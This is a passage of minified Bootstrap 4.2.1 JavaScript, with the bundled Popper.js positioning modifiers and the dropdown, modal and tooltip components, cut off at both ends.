e=i.boundariesElement||jt(t.instance.popper);t.instance.reference===e&&(e=jt(e));var n=re("transform"),o=t.instance.popper.style,r=o.top,s=o.left,a=o[n];o.top="",o.left="",o[n]="";var l=Gt(t.instance.popper,t.instance.reference,i.padding,e,t.positionFixed);o.top=r,o.left=s,o[n]=a,i.boundaries=l;var c=i.priority,h=t.offsets.popper,u={primary:function(t){var e=h[t];return h[t]<l[t]&&!i.escapeWithReference&&(e=Math.max(h[t],l[t])),Kt({},t,e)},secondary:function(t){var e="right"===t?"left":"top",n=h[e];return h[t]>l[t]&&!i.escapeWithReference&&(n=Math.min(h[e],l[t]-("right"===t?h.width:h.height))),Kt({},e,n)}};return c.forEach(function(t){var e=-1!==["left","top"].indexOf(t)?"primary":"secondary";h=Qt({},h,u[e](t))}),t.offsets.popper=h,t},priority:["left","right","top","bottom"],padding:5,boundariesElement:"scrollParent"},keepTogether:{order:400,enabled:!0,fn:function(t){var e=t.offsets,n=e.popper,i=e.reference,o=t.placement.split("-")[0],r=Math.floor,s=-1!==["top","bottom"].indexOf(o),a=s?"right":"bottom",l=s?"left":"top",c=s?"width":"height";return n[a]<r(i[l])&&(t.offsets.popper[l]=r(i[l])-n[c]),n[l]>r(i[a])&&(t.offsets.popper[l]=r(i[a])),t}},arrow:{order:500,enabled:!0,fn:function(t,e){var n;if(!fe(t.instance.modifiers,"arrow","keepTogether"))return t;var i=e.element;if("string"==typeof i){if(!(i=t.instance.popper.querySelector(i)))return t}else if(!t.instance.popper.contains(i))return console.warn("WARNING: `arrow.element` must be child of its popper element!"),t;var o=t.placement.split("-")[0],r=t.offsets,s=r.popper,a=r.reference,l=-1!==["left","right"].indexOf(o),c=l?"height":"width",h=l?"Top":"Left",u=h.toLowerCase(),f=l?"left":"top",d=l?"bottom":"right",p=$t(i)[c];a[d]-p<s[u]&&(t.offsets.popper[u]-=s[u]-(a[d]-p)),a[u]+p>s[d]&&(t.offsets.popper[u]+=a[u]+p-s[d]),t.offsets.popper=Yt(t.offsets.popper);var m=a[u]+a[c]/2-p/2,g=Nt(t.instance.popper),_=parseFloat(g["margin"+h],10),v=parseFloat(g["border"+h+"Width"],10),y=m-t.offsets.popper[u]-_-v;return y=Math.max(Math.min(s[c]-p,y),0),t.arrowElement=i,t.offsets.arrow=(Kt(n={},u,Math.round(y)),Kt(n,f,""),n),t},element:"[x-arrow]"},flip:{order:600,enabled:!0,fn:function(p,m){if(oe(p.instance.modifiers,"inner"))return p;if(p.flipped&&p.placement===p.originalPlacement)return p;var g=Gt(p.instance.popper,p.instance.reference,m.padding,m.boundariesElement,p.positionFixed),_=p.placement.split("-")[0],v=te(_),y=p.placement.split("-")[1]||"",E=[];switch(m.behavior){case ge:E=[_,v];break;case _e:E=me(_);break;case ve:E=me(_,!0);break;default:E=m.behavior}return E.forEach(function(t,e){if(_!==t||E.length===e+1)return p;_=p.placement.split("-")[0],v=te(_);var n,i=p.offsets.popper,o=p.offsets.reference,r=Math.floor,s="left"===_&&r(i.right)>r(o.left)||"right"===_&&r(i.left)<r(o.right)||"top"===_&&r(i.bottom)>r(o.top)||"bottom"===_&&r(i.top)<r(o.bottom),a=r(i.left)<r(g.left),l=r(i.right)>r(g.right),c=r(i.top)<r(g.top),h=r(i.bottom)>r(g.bottom),u="left"===_&&a||"right"===_&&l||"top"===_&&c||"bottom"===_&&h,f=-1!==["top","bottom"].indexOf(_),d=!!m.flipVariations&&(f&&"start"===y&&a||f&&"end"===y&&l||!f&&"start"===y&&c||!f&&"end"===y&&h);(s||u||d)&&(p.flipped=!0,(s||u)&&(_=E[e+1]),d&&(y="end"===(n=y)?"start":"start"===n?"end":n),p.placement=_+(y?"-"+y:""),p.offsets.popper=Qt({},p.offsets.popper,ee(p.instance.popper,p.offsets.reference,p.placement)),p=ie(p.instance.modifiers,p,"flip"))}),p},behavior:"flip",padding:5,boundariesElement:"viewport"},inner:{order:700,enabled:!1,fn:function(t){var e=t.placement,n=e.split("-")[0],i=t.offsets,o=i.popper,r=i.reference,s=-1!==["left","right"].indexOf(n),a=-1===["top","left"].indexOf(n);return o[s?"left":"top"]=r[n]-(a?o[s?"width":"height"]:0),t.placement=te(e),t.offsets.popper=Yt(o),t}},hide:{order:800,enabled:!0,fn:function(t){if(!fe(t.instance.modifiers,"hide","preventOverflow"))return t;var e=t.offsets.reference,n=ne(t.instance.modifiers,function(t){return"preventOverflow"===t.name}).boundaries;if(e.bottom<n.top||e.left>n.right||e.top>n.bottom||e.right<n.left){if(!0===t.hide)return t;t.hide=!0,t.attributes["x-out-of-boundaries"]=""}else{if(!1===t.hide)return t;t.hide=!1,t.attributes["x-out-of-boundaries"]=!1}return t}},computeStyle:{order:850,enabled:!0,fn:function(t,e){var n=e.x,i=e.y,o=t.offsets.popper,r=ne(t.instance.modifiers,function(t){return"applyStyle"===t.name}).gpuAcceleration;void 0!==r&&console.warn("WARNING: `gpuAcceleration` option moved to `computeStyle` modifier and will not be supported in future versions of Popper.js!");var s,a,l,c,h,u,f,d,p,m,g,_,v=void 0!==r?r:e.gpuAcceleration,y=jt(t.instance.popper),E=Vt(y),b={position:o.position},w=(s=t,a=window.devicePixelRatio<2||!ue,l=s.offsets,c=l.popper,h=l.reference,u=-1!==["left","right"].indexOf(s.placement),f=-1!==s.placement.indexOf("-"),d=h.width%2==c.width%2,p=h.width%2==1&&c.width%2==1,m=function(t){return t},g=a?u||f||d?Math.round:Math.floor:m,_=a?Math.round:m,{left:g(p&&!f&&a?c.left-1:c.left),top:_(c.top),bottom:_(c.bottom),right:g(c.right)}),T="bottom"===n?"top":"bottom",C="right"===i?"left":"right",S=re("transform"),D=void 0,I=void 0;if(I="bottom"===T?"HTML"===y.nodeName?-y.clientHeight+w.bottom:-E.height+w.bottom:w.top,D="right"===C?"HTML"===y.nodeName?-y.clientWidth+w.right:-E.width+w.right:w.left,v&&S)b[S]="translate3d("+D+"px, "+I+"px, 0)",b[T]=0,b[C]=0,b.willChange="transform";else{var A="bottom"===T?-1:1,O="right"===C?-1:1;b[T]=I*A,b[C]=D*O,b.willChange=T+", "+C}var N={"x-placement":t.placement};return t.attributes=Qt({},N,t.attributes),t.styles=Qt({},b,t.styles),t.arrowStyles=Qt({},t.offsets.arrow,t.arrowStyles),t},gpuAcceleration:!0,x:"bottom",y:"right"},applyStyle:{order:900,enabled:!0,fn:function(t){var e,n;return he(t.instance.popper,t.styles),e=t.instance.popper,n=t.attributes,Object.keys(n).forEach(function(t){!1!==n[t]?e.setAttribute(t,n[t]):e.removeAttribute(t)}),t.arrowElement&&Object.keys(t.arrowStyles).length&&he(t.arrowElement,t.arrowStyles),t},onLoad:function(t,e,n,i,o){var r=Zt(o,e,t,n.positionFixed),s=Jt(n.placement,r,e,t,n.modifiers.flip.boundariesElement,n.modifiers.flip.padding);return e.setAttribute("x-placement",s),he(e,{position:n.positionFixed?"fixed":"absolute"}),n},gpuAcceleration:void 0}}},be=function(){function r(t,e){var n=this,i=2<arguments.length&&void 0!==arguments[2]?arguments[2]:{};!function(t,e){if(!(t instanceof e))throw new TypeError("Cannot call a class as a function")}(this,r),this.scheduleUpdate=function(){return requestAnimationFrame(n.update)},this.update=At(this.update.bind(this)),this.options=Qt({},r.Defaults,i),this.state={isDestroyed:!1,isCreated:!1,scrollParents:[]},this.reference=t&&t.jquery?t[0]:t,this.popper=e&&e.jquery?e[0]:e,this.options.modifiers={},Object.keys(Qt({},r.Defaults.modifiers,i.modifiers)).forEach(function(t){n.options.modifiers[t]=Qt({},r.Defaults.modifiers[t]||{},i.modifiers?i.modifiers[t]:{})}),this.modifiers=Object.keys(this.options.modifiers).map(function(t){return Qt({name:t},n.options.modifiers[t])}).sort(function(t,e){return t.order-e.order}),this.modifiers.forEach(function(t){t.enabled&&Ot(t.onLoad)&&t.onLoad(n.reference,n.popper,n.options,t,n.state)}),this.update();var o=this.options.eventsEnabled;o&&this.enableEventListeners(),this.state.eventsEnabled=o}return qt(r,[{key:"update",value:function(){return function(){if(!this.state.isDestroyed){var t={instance:this,styles:{},arrowStyles:{},attributes:{},flipped:!1,offsets:{}};t.offsets.reference=Zt(this.state,this.popper,this.reference,this.options.positionFixed),t.placement=Jt(this.options.placement,t.offsets.reference,this.popper,this.reference,this.options.modifiers.flip.boundariesElement,this.options.modifiers.flip.padding),t.originalPlacement=t.placement,t.positionFixed=this.options.positionFixed,t.offsets.popper=ee(this.popper,t.offsets.reference,t.placement),t.offsets.popper.position=this.options.positionFixed?"fixed":"absolute",t=ie(this.modifiers,t),this.state.isCreated?this.options.onUpdate(t):(this.state.isCreated=!0,this.options.onCreate(t))}}.call(this)}},{key:"destroy",value:function(){return function(){return this.state.isDestroyed=!0,oe(this.modifiers,"applyStyle")&&(this.popper.removeAttribute("x-placement"),this.popper.style.position="",this.popper.style.top="",this.popper.style.left="",this.popper.style.right="",this.popper.style.bottom="",this.popper.style.willChange="",this.popper.style[re("transform")]=""),this.disableEventListeners(),this.options.removeOnDestroy&&this.popper.parentNode.removeChild(this.popper),this}.call(this)}},{key:"enableEventListeners",value:function(){return function(){this.state.eventsEnabled||(this.state=ae(this.reference,this.options,this.state,this.scheduleUpdate))}.call(this)}},{key:"disableEventListeners",value:function(){return le.call(this)}}]),r}();be.Utils=("undefined"!=typeof window?window:global).PopperUtils,be.placements=de,be.Defaults=Ee;var we="dropdown",Te="bs.dropdown",Ce="."+Te,Se=".data-api",De=p.fn[we],Ie=new RegExp("38|40|27"),Ae={HIDE:"hide"+Ce,HIDDEN:"hidden"+Ce,SHOW:"show"+Ce,SHOWN:"shown"+Ce,CLICK:"click"+Ce,CLICK_DATA_API:"click"+Ce+Se,KEYDOWN_DATA_API:"keydown"+Ce+Se,KEYUP_DATA_API:"keyup"+Ce+Se},Oe="disabled",Ne="show",ke="dropup",Le="dropright",Pe="dropleft",xe="dropdown-menu-right",He="position-static",je='[data-toggle="dropdown"]',Re=".dropdown form",Fe=".dropdown-menu",Me=".navbar-nav",We=".dropdown-menu .dropdown-item:not(.disabled):not(:disabled)",Ue="top-start",Be="top-end",qe="bottom-start",Ke="bottom-end",Qe="right-start",Ye="left-start",Ve={offset:0,flip:!0,boundary:"scrollParent",reference:"toggle",display:"dynamic"},Xe={offset:"(number|string|function)",flip:"boolean",boundary:"(string|element)",reference:"(string|element)",display:"string"},ze=function(){function c(t,e){this._element=t,this._popper=null,this._config=this._getConfig(e),this._menu=this._getMenuElement(),this._inNavbar=this._detectNavbar(),this._addEventListeners()}var t=c.prototype;return t.toggle=function(){if(!this._element.disabled&&!p(this._element).hasClass(Oe)){var t=c._getParentFromElement(this._element),e=p(this._menu).hasClass(Ne);if(c._clearMenus(),!e){var n={relatedTarget:this._element},i=p.Event(Ae.SHOW,n);if(p(t).trigger(i),!i.isDefaultPrevented()){if(!this._inNavbar){if("undefined"==typeof be)throw new TypeError("Bootstrap's dropdowns require Popper.js (https://popper.js.org/)");var o=this._element;"parent"===this._config.reference?o=t:m.isElement(this._config.reference)&&(o=this._config.reference,"undefined"!=typeof this._config.reference.jquery&&(o=this._config.reference[0])),"scrollParent"!==this._config.boundary&&p(t).addClass(He),this._popper=new be(o,this._menu,this._getPopperConfig())}"ontouchstart"in document.documentElement&&0===p(t).closest(Me).length&&p(document.body).children().on("mouseover",null,p.noop),this._element.focus(),this._element.setAttribute("aria-expanded",!0),p(this._menu).toggleClass(Ne),p(t).toggleClass(Ne).trigger(p.Event(Ae.SHOWN,n))}}}},t.show=function(){if(!(this._element.disabled||p(this._element).hasClass(Oe)||p(this._menu).hasClass(Ne))){var t={relatedTarget:this._element},e=p.Event(Ae.SHOW,t),n=c._getParentFromElement(this._element);p(n).trigger(e),e.isDefaultPrevented()||(p(this._menu).toggleClass(Ne),p(n).toggleClass(Ne).trigger(p.Event(Ae.SHOWN,t)))}},t.hide=function(){if(!this._element.disabled&&!p(this._element).hasClass(Oe)&&p(this._menu).hasClass(Ne)){var t={relatedTarget:this._element},e=p.Event(Ae.HIDE,t),n=c._getParentFromElement(this._element);p(n).trigger(e),e.isDefaultPrevented()||(p(this._menu).toggleClass(Ne),p(n).toggleClass(Ne).trigger(p.Event(Ae.HIDDEN,t)))}},t.dispose=function(){p.removeData(this._element,Te),p(this._element).off(Ce),this._element=null,(this._menu=null)!==this._popper&&(this._popper.destroy(),this._popper=null)},t.update=function(){this._inNavbar=this._detectNavbar(),null!==this._popper&&this._popper.scheduleUpdate()},t._addEventListeners=function(){var e=this;p(this._element).on(Ae.CLICK,function(t){t.preventDefault(),t.stopPropagation(),e.toggle()})},t._getConfig=function(t){return t=l({},this.constructor.Default,p(this._element).data(),t),m.typeCheckConfig(we,t,this.constructor.DefaultType),t},t._getMenuElement=function(){if(!this._menu){var t=c._getParentFromElement(this._element);t&&(this._menu=t.querySelector(Fe))}return this._menu},t._getPlacement=function(){var t=p(this._element.parentNode),e=qe;return t.hasClass(ke)?(e=Ue,p(this._menu).hasClass(xe)&&(e=Be)):t.hasClass(Le)?e=Qe:t.hasClass(Pe)?e=Ye:p(this._menu).hasClass(xe)&&(e=Ke),e},t._detectNavbar=function(){return 0<p(this._element).closest(".navbar").length},t._getPopperConfig=function(){var e=this,t={};"function"==typeof this._config.offset?t.fn=function(t){return t.offsets=l({},t.offsets,e._config.offset(t.offsets)||{}),t}:t.offset=this._config.offset;var n={placement:this._getPlacement(),modifiers:{offset:t,flip:{enabled:this._config.flip},preventOverflow:{boundariesElement:this._config.boundary}}};return"static"===this._config.display&&(n.modifiers.applyStyle={enabled:!1}),n},c._jQueryInterface=function(e){return this.each(function(){var t=p(this).data(Te);if(t||(t=new c(this,"object"==typeof e?e:null),p(this).data(Te,t)),"string"==typeof e){if("undefined"==typeof t[e])throw new TypeError('No method named "'+e+'"');t[e]()}})},c._clearMenus=function(t){if(!t||3!==t.which&&("keyup"!==t.type||9===t.which))for(var e=[].slice.call(document.querySelectorAll(je)),n=0,i=e.length;n<i;n++){var o=c._getParentFromElement(e[n]),r=p(e[n]).data(Te),s={relatedTarget:e[n]};if(t&&"click"===t.type&&(s.clickEvent=t),r){var a=r._menu;if(p(o).hasClass(Ne)&&!(t&&("click"===t.type&&/input|textarea/i.test(t.target.tagName)||"keyup"===t.type&&9===t.which)&&p.contains(o,t.target))){var l=p.Event(Ae.HIDE,s);p(o).trigger(l),l.isDefaultPrevented()||("ontouchstart"in document.documentElement&&p(document.body).children().off("mouseover",null,p.noop),e[n].setAttribute("aria-expanded","false"),p(a).removeClass(Ne),p(o).removeClass(Ne).trigger(p.Event(Ae.HIDDEN,s)))}}}},c._getParentFromElement=function(t){var e,n=m.getSelectorFromElement(t);return n&&(e=document.querySelector(n)),e||t.parentNode},c._dataApiKeydownHandler=function(t){if((/input|textarea/i.test(t.target.tagName)?!(32===t.which||27!==t.which&&(40!==t.which&&38!==t.which||p(t.target).closest(Fe).length)):Ie.test(t.which))&&(t.preventDefault(),t.stopPropagation(),!this.disabled&&!p(this).hasClass(Oe))){var e=c._getParentFromElement(this),n=p(e).hasClass(Ne);if(n&&(!n||27!==t.which&&32!==t.which)){var i=[].slice.call(e.querySelectorAll(We));if(0!==i.length){var o=i.indexOf(t.target);38===t.which&&0<o&&o--,40===t.which&&o<i.length-1&&o++,o<0&&(o=0),i[o].focus()}}else{if(27===t.which){var r=e.querySelector(je);p(r).trigger("focus")}p(this).trigger("click")}}},s(c,null,[{key:"VERSION",get:function(){return"4.2.1"}},{key:"Default",get:function(){return Ve}},{key:"DefaultType",get:function(){return Xe}}]),c}();p(document).on(Ae.KEYDOWN_DATA_API,je,ze._dataApiKeydownHandler).on(Ae.KEYDOWN_DATA_API,Fe,ze._dataApiKeydownHandler).on(Ae.CLICK_DATA_API+" "+Ae.KEYUP_DATA_API,ze._clearMenus).on(Ae.CLICK_DATA_API,je,function(t){t.preventDefault(),t.stopPropagation(),ze._jQueryInterface.call(p(this),"toggle")}).on(Ae.CLICK_DATA_API,Re,function(t){t.stopPropagation()}),p.fn[we]=ze._jQueryInterface,p.fn[we].Constructor=ze,p.fn[we].noConflict=function(){return p.fn[we]=De,ze._jQueryInterface};var Ge="modal",Je="bs.modal",Ze="."+Je,$e=p.fn[Ge],tn={backdrop:!0,keyboard:!0,focus:!0,show:!0},en={backdrop:"(boolean|string)",keyboard:"boolean",focus:"boolean",show:"boolean"},nn={HIDE:"hide"+Ze,HIDDEN:"hidden"+Ze,SHOW:"show"+Ze,SHOWN:"shown"+Ze,FOCUSIN:"focusin"+Ze,RESIZE:"resize"+Ze,CLICK_DISMISS:"click.dismiss"+Ze,KEYDOWN_DISMISS:"keydown.dismiss"+Ze,MOUSEUP_DISMISS:"mouseup.dismiss"+Ze,MOUSEDOWN_DISMISS:"mousedown.dismiss"+Ze,CLICK_DATA_API:"click"+Ze+".data-api"},on="modal-scrollbar-measure",rn="modal-backdrop",sn="modal-open",an="fade",ln="show",cn=".modal-dialog",hn='[data-toggle="modal"]',un='[data-dismiss="modal"]',fn=".fixed-top, .fixed-bottom, .is-fixed, .sticky-top",dn=".sticky-top",pn=function(){function o(t,e){this._config=this._getConfig(e),this._element=t,this._dialog=t.querySelector(cn),this._backdrop=null,this._isShown=!1,this._isBodyOverflowing=!1,this._ignoreBackdropClick=!1,this._isTransitioning=!1,this._scrollbarWidth=0}var t=o.prototype;return t.toggle=function(t){return this._isShown?this.hide():this.show(t)},t.show=function(t){var e=this;if(!this._isShown&&!this._isTransitioning){p(this._element).hasClass(an)&&(this._isTransitioning=!0);var n=p.Event(nn.SHOW,{relatedTarget:t});p(this._element).trigger(n),this._isShown||n.isDefaultPrevented()||(this._isShown=!0,this._checkScrollbar(),this._setScrollbar(),this._adjustDialog(),this._setEscapeEvent(),this._setResizeEvent(),p(this._element).on(nn.CLICK_DISMISS,un,function(t){return e.hide(t)}),p(this._dialog).on(nn.MOUSEDOWN_DISMISS,function(){p(e._element).one(nn.MOUSEUP_DISMISS,function(t){p(t.target).is(e._element)&&(e._ignoreBackdropClick=!0)})}),this._showBackdrop(function(){return e._showElement(t)}))}},t.hide=function(t){var e=this;if(t&&t.preventDefault(),this._isShown&&!this._isTransitioning){var n=p.Event(nn.HIDE);if(p(this._element).trigger(n),this._isShown&&!n.isDefaultPrevented()){this._isShown=!1;var i=p(this._element).hasClass(an);if(i&&(this._isTransitioning=!0),this._setEscapeEvent(),this._setResizeEvent(),p(document).off(nn.FOCUSIN),p(this._element).removeClass(ln),p(this._element).off(nn.CLICK_DISMISS),p(this._dialog).off(nn.MOUSEDOWN_DISMISS),i){var o=m.getTransitionDurationFromElement(this._element);p(this._element).one(m.TRANSITION_END,function(t){return e._hideModal(t)}).emulateTransitionEnd(o)}else this._hideModal()}}},t.dispose=function(){[window,this._element,this._dialog].forEach(function(t){return p(t).off(Ze)}),p(document).off(nn.FOCUSIN),p.removeData(this._element,Je),this._config=null,this._element=null,this._dialog=null,this._backdrop=null,this._isShown=null,this._isBodyOverflowing=null,this._ignoreBackdropClick=null,this._isTransitioning=null,this._scrollbarWidth=null},t.handleUpdate=function(){this._adjustDialog()},t._getConfig=function(t){return t=l({},tn,t),m.typeCheckConfig(Ge,t,en),t},t._showElement=function(t){var e=this,n=p(this._element).hasClass(an);this._element.parentNode&&this._element.parentNode.nodeType===Node.ELEMENT_NODE||document.body.appendChild(this._element),this._element.style.display="block",this._element.removeAttribute("aria-hidden"),this._element.setAttribute("aria-modal",!0),this._element.scrollTop=0,n&&m.reflow(this._element),p(this._element).addClass(ln),this._config.focus&&this._enforceFocus();var i=p.Event(nn.SHOWN,{relatedTarget:t}),o=function(){e._config.focus&&e._element.focus(),e._isTransitioning=!1,p(e._element).trigger(i)};if(n){var r=m.getTransitionDurationFromElement(this._dialog);p(this._dialog).one(m.TRANSITION_END,o).emulateTransitionEnd(r)}else o()},t._enforceFocus=function(){var e=this;p(document).off(nn.FOCUSIN).on(nn.FOCUSIN,function(t){document!==t.target&&e._element!==t.target&&0===p(e._element).has(t.target).length&&e._element.focus()})},t._setEscapeEvent=function(){var e=this;this._isShown&&this._config.keyboard?p(this._element).on(nn.KEYDOWN_DISMISS,function(t){27===t.which&&(t.preventDefault(),e.hide())}):this._isShown||p(this._element).off(nn.KEYDOWN_DISMISS)},t._setResizeEvent=function(){var e=this;this._isShown?p(window).on(nn.RESIZE,function(t){return e.handleUpdate(t)}):p(window).off(nn.RESIZE)},t._hideModal=function(){var t=this;this._element.style.display="none",this._element.setAttribute("aria-hidden",!0),this._element.removeAttribute("aria-modal"),this._isTransitioning=!1,this._showBackdrop(function(){p(document.body).removeClass(sn),t._resetAdjustments(),t._resetScrollbar(),p(t._element).trigger(nn.HIDDEN)})},t._removeBackdrop=function(){this._backdrop&&(p(this._backdrop).remove(),this._backdrop=null)},t._showBackdrop=function(t){var e=this,n=p(this._element).hasClass(an)?an:"";if(this._isShown&&this._config.backdrop){if(this._backdrop=document.createElement("div"),this._backdrop.className=rn,n&&this._backdrop.classList.add(n),p(this._backdrop).appendTo(document.body),p(this._element).on(nn.CLICK_DISMISS,function(t){e._ignoreBackdropClick?e._ignoreBackdropClick=!1:t.target===t.currentTarget&&("static"===e._config.backdrop?e._element.focus():e.hide())}),n&&m.reflow(this._backdrop),p(this._backdrop).addClass(ln),!t)return;if(!n)return void t();var i=m.getTransitionDurationFromElement(this._backdrop);p(this._backdrop).one(m.TRANSITION_END,t).emulateTransitionEnd(i)}else if(!this._isShown&&this._backdrop){p(this._backdrop).removeClass(ln);var o=function(){e._removeBackdrop(),t&&t()};if(p(this._element).hasClass(an)){var r=m.getTransitionDurationFromElement(this._backdrop);p(this._backdrop).one(m.TRANSITION_END,o).emulateTransitionEnd(r)}else o()}else t&&t()},t._adjustDialog=function(){var t=this._element.scrollHeight>document.documentElement.clientHeight;!this._isBodyOverflowing&&t&&(this._element.style.paddingLeft=this._scrollbarWidth+"px"),this._isBodyOverflowing&&!t&&(this._element.style.paddingRight=this._scrollbarWidth+"px")},t._resetAdjustments=function(){this._element.style.paddingLeft="",this._element.style.paddingRight=""},t._checkScrollbar=function(){var t=document.body.getBoundingClientRect();this._isBodyOverflowing=t.left+t.right<window.innerWidth,this._scrollbarWidth=this._getScrollbarWidth()},t._setScrollbar=function(){var o=this;if(this._isBodyOverflowing){var t=[].slice.call(document.querySelectorAll(fn)),e=[].slice.call(document.querySelectorAll(dn));p(t).each(function(t,e){var n=e.style.paddingRight,i=p(e).css("padding-right");p(e).data("padding-right",n).css("padding-right",parseFloat(i)+o._scrollbarWidth+"px")}),p(e).each(function(t,e){var n=e.style.marginRight,i=p(e).css("margin-right");p(e).data("margin-right",n).css("margin-right",parseFloat(i)-o._scrollbarWidth+"px")});var n=document.body.style.paddingRight,i=p(document.body).css("padding-right");p(document.body).data("padding-right",n).css("padding-right",parseFloat(i)+this._scrollbarWidth+"px")}p(document.body).addClass(sn)},t._resetScrollbar=function(){var t=[].slice.call(document.querySelectorAll(fn));p(t).each(function(t,e){var n=p(e).data("padding-right");p(e).removeData("padding-right"),e.style.paddingRight=n||""});var e=[].slice.call(document.querySelectorAll(""+dn));p(e).each(function(t,e){var n=p(e).data("margin-right");"undefined"!=typeof n&&p(e).css("margin-right",n).removeData("margin-right")});var n=p(document.body).data("padding-right");p(document.body).removeData("padding-right"),document.body.style.paddingRight=n||""},t._getScrollbarWidth=function(){var t=document.createElement("div");t.className=on,document.body.appendChild(t);var e=t.getBoundingClientRect().width-t.clientWidth;return document.body.removeChild(t),e},o._jQueryInterface=function(n,i){return this.each(function(){var t=p(this).data(Je),e=l({},tn,p(this).data(),"object"==typeof n&&n?n:{});if(t||(t=new o(this,e),p(this).data(Je,t)),"string"==typeof n){if("undefined"==typeof t[n])throw new TypeError('No method named "'+n+'"');t[n](i)}else e.show&&t.show(i)})},s(o,null,[{key:"VERSION",get:function(){return"4.2.1"}},{key:"Default",get:function(){return tn}}]),o}();p(document).on(nn.CLICK_DATA_API,hn,function(t){var e,n=this,i=m.getSelectorFromElement(this);i&&(e=document.querySelector(i));var o=p(e).data(Je)?"toggle":l({},p(e).data(),p(this).data());"A"!==this.tagName&&"AREA"!==this.tagName||t.preventDefault();var r=p(e).one(nn.SHOW,function(t){t.isDefaultPrevented()||r.one(nn.HIDDEN,function(){p(n).is(":visible")&&n.focus()})});pn._jQueryInterface.call(p(e),o,this)}),p.fn[Ge]=pn._jQueryInterface,p.fn[Ge].Constructor=pn,p.fn[Ge].noConflict=function(){return p.fn[Ge]=$e,pn._jQueryInterface};var mn="tooltip",gn="bs.tooltip",_n="."+gn,vn=p.fn[mn],yn="bs-tooltip",En=new RegExp("(^|\\s)"+yn+"\\S+","g"),bn={animation:"boolean",template:"string",title:"(string|element|function)",trigger:"string",delay:"(number|object)",html:"boolean",selector:"(string|boolean)",placement:"(string|function)",offset:"(number|string)",container:"(string|element|boolean)",fallbackPlacement:"(string|array)",boundary:"(string|element)"},wn={AUTO:"auto",TOP:"top",RIGHT:"right",BOTTOM:"bottom",LEFT:"left"},Tn={animation:!0,template:'<div class="tooltip" role="tooltip"><div class="arrow"></div><div class="tooltip-inner"></div></div>',trigger:"hover focus",title:"",delay:0,html:!1,selector:!1,placement:"top",offset:0,container:!1,fallbackPlacement:"flip",boundary:"scrollParent"},Cn="show",Sn="out",Dn={HIDE:"hide"+_n,HIDDEN:"hidden"+_n,SHOW:"show"+_n,SHOWN:"shown"+_n,INSERTED:"inserted"+_n,CLICK:"click"+_n,FOCUSIN:"focusin"+_n,FOCUSOUT:"focusout"+_n,MOUSEENTER:"mouseenter"+_n,MOUSELEAVE:"mouseleave"+_n},In="fade",An="show",On=".tooltip-inner",Nn=".arrow",kn="hover",Ln="focus",Pn="click",xn="manual",Hn=function(){function i(t,e){if("undefined"==typeof be)throw new TypeError("Bootstrap's tooltips require Popper.js (https://popper.js.org/)");this._isEnabled=!0,this._timeout=0,this._hoverState="",this._activeTrigger={},this._popper=null,this.element=t,this.config=this._getConfig(e),this.tip=null,this._setListeners()}var t=i.prototype;return t.enable=function(){this._isEnabled=!0},t.disable=function(){this._isEnabled=!1},t.toggleEnabled=function(){this._isEnabled=!this._isEnabled},t.toggle=function(t){if(this._isEnabled)if(t){var e=this.constructor.DATA_KEY,n=p(t.currentTarget).data(e);n||(n=new this.constructor(t.currentTarget,this._getDelegateConfig()),p(t.currentTarget).data(e,n)),n._activeTrigger.click=!n._activeTrigger.click,n._isWithActiveTrigger()?n._enter(null,n):n._leave(null,n)}else{if(p(this.getTipElement()).hasClass(An))return void this._leave(null,this);this._enter(null,this)}},t.dispose=function(){clearTimeout(this._timeout),p.removeData(this.element,this.constructor.DATA_KEY),p(this.element).off(this.constructor.EVENT_KEY),p(this.element).closest(".modal").off("hide.bs.modal"),this.tip&&p(this.tip).remove(),this._isEnabled=null,this._timeout=null,this._hoverState=null,(this._activeTrigger=null)!==this._popper&&this._popper.destroy(),this._popper=null,this.element=null,this.config=null,this.tip=null},t.show=function(){var e=this;if("none"===p(this.element).css("display"))throw new Error("Please use show on visible elements");var t=p.Event(this.constructor.Event.SHOW);if(this.isWithContent()&&this._isEnabled){p(this.element).trigger(t);var n=m.findShadowRoot(this.element),i=p.contains(null!==n?n:this.element.ownerDocument.documentElement,this.element);if(t.isDefaultPrevented()||!i)return;var o=this.getTipElement(),r=m.getUID(this.constructor.NAME);o.setAttribute("id",r),this.element.setAttribute("aria-describedby",r),this.setContent(),this.config.animation&&p(o).addClass(In);var s="function"==typeof this.config.placement?this.config.placement.call(this,o,this.element):this.config.placement,a=this._getAttachment(s);this.addAttachmentClass(a);var l=this._getContainer();p(o).data(this.constructor.DATA_KEY,this),p.contains(this.element.ownerDocument.documentElement,this.tip)||p(o).appendTo(l),p(this.element).trigger(this.constructor.Event.INSERTED),this._popper=new be(this.element,o,{placement:a,modifiers:{offset:{offset:this.config.offset},flip:{behavior:this.config.fallbackPlacement},arrow:{element:Nn},preventOverflow:{boundariesElement:this.config.boundary}},onCreate:function(t){t.originalPlacement!==t.placement&&e._handlePopperPlacementChange(t)},onUpdate:function(t){return e._handlePopperPlacementChange(t)}}),p(o).addClass(An),"ontouchstart"in document.documentElement&&p(document.body).children().on("mouseover",null,p.noop);var c=function(){e.config.animation&&e._fixTransition();var t=e._hoverState;e._hoverState=null,p(e.element).trigger(e.constructor.Event.SHOWN),t===Sn&&e._leave(null,e)};if(p(this.tip).hasClass(In)){var h=m.getTransitionDurationFromElement(this.tip);p(this.tip).one(m.TRANSITION_END,c).emulateTransitionEnd(h)}else c()}},t.hide=function(t){var e=this,n=this.getTipElement(),i=p.Event(this.constructor.Event.HIDE),o=function(){e._hoverState!==Cn&&n.parentNode&&n.parentNode.removeChild(n),e._cleanTipClass(),e.element.removeAttribute("aria-describedby"),p(e.element).trigger(e.constructor.Event.HIDDEN),null!==e._popper&&e._popper.destroy(),t&&t()};if(p(this.element).trigger(i),!i.isDefaultPrevented()){if(p(n).removeClass(An),"ontouchstart"in document.documentElement&&p(document.body).children().off("mouseover",null,p.noop),this._activeTrigger[Pn]=!1,this._activeTrigger[Ln]=!1,this._activeTrigger[kn]=!1,p(this.tip).hasClass(In)){var r=m.getTransitionDurationFromElement(n);p(n).one(m.TRANSITION_END,o).emulateTransitionEnd(r)}else o();this._hoverState=""}},t.update=function(){null!==this._popper&&this._popper.scheduleUpdate()},t.isWithContent=function(){return Boolean(this.getTitle())},t.addAttachmentClass=function(t){p(this.getTipElement()).addClass(yn+"-"+t)},t.getTipElement=function(){return this.tip=this.tip||p(this.config.template)[0],this.tip},t.setContent=function(){var t=this.getTipElement();this.setElementContent(p(t.querySelectorAll(On)),this.getTitle()),p(t).removeClass(In+" "+An)},t.setElementContent=function(t,e){var n=this.config.html;"object"==typeof 